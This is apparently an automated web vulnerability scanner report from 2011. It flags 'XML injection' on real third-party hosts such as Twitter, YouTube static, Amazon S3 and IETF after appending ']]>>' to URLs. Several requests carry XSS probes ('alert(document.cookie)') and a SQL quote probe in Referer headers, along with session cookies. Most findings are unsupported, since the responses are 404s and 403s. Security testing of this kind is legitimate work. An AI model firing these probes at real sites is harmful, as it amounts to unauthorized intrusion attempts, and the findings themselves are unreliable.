myPAL=eJylkstOw0AMRf%252Bls52F7Xl4Jl0FIqRKJIISULcsu2YJ%252FDv2TB4tqgqCVV7nnnhsvzbIzfuxge1bQ9xs0Mdscs5oELyBCGaUm17e0GZ7bFCxqBiHCWMwACgYw0zRIluoSzInmC%252ByFAyl4DhbB8QSIh%252BKtb0Z7W54sfv%252BYG%252Fve9t2B0365QeJr%252FwgrFg6wVLFxhmLgmE6xQjA%252BBSNfuWLEoQqeZ4lSbEqmRvITs5A5onAS90fgMpl4WLR5dIbbzMxBLQEBEEfHMZ6kTa42oaulbN3j8Nou91wZ7Ur0o0yEB1cjH%252FyqWpu7tRYxP%252Fp2odBVVLhvuh0Ezx%252B010zlFRZDLem8DxVazkfecnpWrj0U06HG5DKcDGsEf5lJK7VXYmUJZmqk1N9fgFco7yt;
Response
HTTP/1.1 404 Not Found Connection: close Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:51:36 GMT Server: HTTP server
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /widgets.js]]>> HTTP/1.1 Host: platform.twitter.com Proxy-Connection: keep-alive Referer: http://www.kledy.de/bookmarks.php?18fe2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef67307aec5=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; __utmv=43838368.lang%3A%20en; k=173.193.214.243.1296843754823170
Response
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sat, 05 Feb 2011 23:33:58 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /widgets]]>>/tweet_button.html HTTP/1.1 Host: platform.twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sat, 05 Feb 2011 22:58:38 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /widgets/tweet_button.html]]>> HTTP/1.1 Host: platform.twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sat, 05 Feb 2011 22:58:39 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /widgets]]>>/tweet_button.html?_=1296947270249&count=horizontal&lang=de&text=Kledy.de%20-%20Bookmark%20%7C%20News%20%7C%20Videos%20%7C%20Bilder&url=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%2Fscript%25253Eef67307aec5%3D1&via=kledys HTTP/1.1 Host: platform0.twitter.com Proxy-Connection: keep-alive Referer: http://www.kledy.de/bookmarks.php?18fe2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef67307aec5=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; __utmv=43838368.lang%3A%20en; k=173.193.214.243.1296843754823170
Response
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sat, 05 Feb 2011 23:07:28 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /widgets/tweet_button.html]]>>?_=1296947270249&count=horizontal&lang=de&text=Kledy.de%20-%20Bookmark%20%7C%20News%20%7C%20Videos%20%7C%20Bilder&url=http%3A%2F%2Fwww.kledy.de%2Fbookmarks.php%3F18fe2%252522%25253E%25253Cscript%25253Ealert(document.cookie)%25253C%2Fscript%25253Eef67307aec5%3D1&via=kledys HTTP/1.1 Host: platform0.twitter.com Proxy-Connection: keep-alive Referer: http://www.kledy.de/bookmarks.php?18fe2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef67307aec5=1 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=43838368.1296314194.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/92; __utma=43838368.1078689092.1296223511.1296521894.1296663641.5; __utmv=43838368.lang%3A%20en; k=173.193.214.243.1296843754823170
Response
HTTP/1.1 403 Forbidden Content-Type: application/xml Date: Sat, 05 Feb 2011 23:07:29 GMT Connection: close Connection: Transfer-Encoding Content-Length: 231
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/cssbin]]>>/www-embed-vflPrzZNL.css HTTP/1.1 Host: s.ytimg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Cache-Control: public, max-age=31104000 Expires: Sun, 26 Dec 2032 06:12:01 GMT Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:59:08 GMT Server: lighttpd-yt/1.4.18 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/cssbin/www-embed-vflPrzZNL.css]]>> HTTP/1.1 Host: s.ytimg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:59:09 GMT Server: lighttpd-yt/1.4.18 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/jsbin]]>>/www-embed-vfl4nNnFQ.js HTTP/1.1 Host: s.ytimg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Cache-Control: public, max-age=31104000 Expires: Sun, 26 Dec 2032 06:12:01 GMT Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:59:11 GMT Server: lighttpd-yt/1.4.18 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /yt/jsbin/www-embed-vfl4nNnFQ.js]]>> HTTP/1.1 Host: s.ytimg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Content-Type: text/html Content-Length: 345 Date: Sat, 05 Feb 2011 22:59:12 GMT Server: lighttpd-yt/1.4.18 Connection: close
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /new.cetrk.com]]>>/pages/scripts/0010/9642.js HTTP/1.1 Host: s3.amazonaws.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found x-amz-request-id: ADBA3FAC6761FDCC x-amz-id-2: kz7PrxEOVMDrf+Fx2O/bG6CfCR5xuAW2LJRbUvlCUAtAdhhKuIeiTi/ZIXHBfsKx Content-Type: application/xml Date: Sat, 05 Feb 2011 22:59:46 GMT Server: AmazonS3 Content-Length: 301
<?xml version="1.0" encoding="UTF-8"?> <Error><Code>NoSuchBucket</Code><Message>The specified bucket does not exist</Message><BucketName>new.cetrk.com]]>></BucketName><RequestId>ADBA3FAC6761FDCC ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /new.cetrk.com/pages]]>>/scripts/0010/9642.js HTTP/1.1 Host: s3.amazonaws.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /new.cetrk.com/pages/scripts]]>>/0010/9642.js HTTP/1.1 Host: s3.amazonaws.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /new.cetrk.com/pages/scripts/0010]]>>/9642.js HTTP/1.1 Host: s3.amazonaws.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /new.cetrk.com/pages/scripts/0010/9642.js]]>> HTTP/1.1 Host: s3.amazonaws.com Proxy-Connection: keep-alive Referer: http://homeappliance.manualsonline.com/ex/mfg/headline/m/ariens47888%2527%253balert%2528document.cookie%2529%252f%252f8fcf167d281/d/type/product_problem Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The sort parameter appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the sort parameter. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /apps/All/4.x/?sort=downloads]]>> HTTP/1.1 Host: splunkbase.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296942930878168; ssoj=1; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=962720tkf55lv04kpjb1vmi5u6; sso=173.193.214.243.1296942930878168; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmb=204527314.1.10.1296942566;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 23:00:12 GMT Server: Apache/2.2.8 (EL) X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 52168
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <!-- web4 ...[SNIP]... <p>Sideview Utils provides new utilities and modules that make it radically easier to develop and maintain custom user interfaces using Splunk's Advanced XML...</p> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /html]]>>/rfc2234] HTTP/1.1 Host: tools.ietf.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:42:48 GMT Server: Apache/2.2.16 (Debian) Vary: accept-language,accept-charset,Accept-Encoding Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 29631
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv=" ...[SNIP]... <a href="http://xml.resource.org"> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /html]]>>/rfc3492 HTTP/1.1 Host: tools.ietf.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:42:41 GMT Server: Apache/2.2.16 (Debian) Vary: accept-language,accept-charset,Accept-Encoding Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 29631
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv=" ...[SNIP]... <a href="http://xml.resource.org"> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /html]]>>/rfc3986 HTTP/1.1 Host: tools.ietf.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:42:55 GMT Server: Apache/2.2.16 (Debian) Vary: accept-language,accept-charset,Accept-Encoding Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 29631
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html> <head> <meta http-equiv=" ...[SNIP]... <a href="http://xml.resource.org"> ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /ads]]>>/adjs.php?n=424430122&what=zone:4&exclude=,&referer=http%3A//burp/show/23 HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /ads/adjs.php]]>>?n=424430122&what=zone:4&exclude=,&referer=http%3A//burp/show/23 HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /ads]]>>/adlog.php?bannerid=75&clientid=52&zoneid=4&source=&block=0&capping=0&cb=d44f13e3bc6b9e50f3529e3826e3166b HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /ads/adlog.php]]>>?bannerid=75&clientid=52&zoneid=4&source=&block=0&capping=0&cb=d44f13e3bc6b9e50f3529e3826e3166b HTTP/1.1 Host: www.linuxsecurity.com Proxy-Connection: keep-alive Referer: http://www.linuxsecurity.com/advisories/?1'=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: 473097ac08cef5345a0ef7ef35a119cd=-
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /index.php]]>> HTTP/1.1 Host: www.nmworkwear.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 23:37:10 GMT Server: Apache/2.2 Vary: accept-language,accept-charset Accept-Ranges: bytes Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en X-Pad: avoid browser bug Content-Length: 1018
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /favicon.ico]]>> HTTP/1.1 Host: www.peppernews.eu Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=47btvqa55udv0p4ltkl1kicifnu5suf1
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 17:52:59 GMT Server: Apache/2.2.10 (Linux/SUSE) Vary: accept-language,accept-charset Accept-Ranges: bytes Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1038
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /tracking]]>>/mpr.php?kunde=nokia&nwid=zx&keyword=bannerID&ctn=mg&zanpid=13849089C1902184109S14786739T1469378460744041488 HTTP/1.1 Host: www.traffictrack.de Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzEzODQ5MDg5QzE5MDIxODQxMDlTMTQ3ODY3MzlUJnpwYXIwPTY3N18xXzcyOHg5MF8zNjBfcHZjX2FkNG1hdGRlZGF1bHQ= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Date: Sun, 06 Feb 2011 17:42:12 GMT Server: Apache/2.2.8 (Linux/SUSE) Vary: accept-language,accept-charset Accept-Ranges: bytes P3P: policyref="http://www.traffictrack.de/w3c/p3p.xml", CP="ALL DSP COR NID" Connection: close Content-Type: text/html; charset=iso-8859-1 Content-Language: en Content-Length: 1604
<?xml version="1.0" encoding="ISO-8859-1"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" l ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /tracking/mpr.php]]>>?kunde=nokia&nwid=zx&keyword=bannerID&ctn=mg&zanpid=13849089C1902184109S14786739T1469378460744041488 HTTP/1.1 Host: www.traffictrack.de Proxy-Connection: keep-alive Referer: http://www.ad4mat.de/ads/redir.php?nurl=aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzE0Nzg2NzM5QzQzNTY3MTEwNiZVTFA9aHR0cDovL2FkLnphbm94LmNvbS90cHYvPzEzODQ5MDg5QzE5MDIxODQxMDlTMTQ3ODY3MzlUJnpwYXIwPTY3N18xXzcyOHg5MF8zNjBfcHZjX2FkNG1hdGRlZGF1bHQ= Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
